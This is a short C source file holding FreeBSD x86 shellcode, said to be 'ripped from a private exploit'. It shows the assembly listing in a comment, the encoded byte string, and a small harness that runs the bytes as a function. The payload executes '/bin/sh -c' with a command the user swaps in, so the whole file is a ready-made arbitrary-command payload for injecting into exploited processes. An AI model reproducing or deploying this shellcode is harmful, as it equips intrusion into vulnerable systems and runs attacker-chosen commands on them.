/*
	FreeBSD Shellcode
	ripped from a private exploit :)
	
	jmp    0x37
	pop    %esi
	xor    %eax,%eax
	mov    %al,0xfffffffa(%esi)
	mov    %eax,0xfffffff5(%esi)
	mov    %esi,(%esi)
	mov    %esi,0x4(%esi)
	mov    %esi,0x8(%esi)
	addl   $0x10,(%esi)
	addl   $0x18,0x4(%esi)
	addl   $0x1b,0x8(%esi)
	mov    %eax,0xc(%esi)
	mov    %al,0x17(%esi)
	mov    %al,0x1a(%esi)
	mov    %al,0x1d(%esi)
	push   %eax
	push   %esi
	pushl  (%esi)
	mov    $0x3b,%al
	push   %eax
	nop
	lcall  $0x707,$0x1010101
	call   0xc4ffffff
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	.string "/bin/sh.-c.sh"
      Replace .sh with .anycommand
*/

char code[]=
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02/bin/sh.-c.sh";

main()
{
  int (*f)();
  f = (int (*)()) code;
  printf("FreeBSD custom shellcode, %d bytes\n", strlen(code));
  (int)(*f)();
}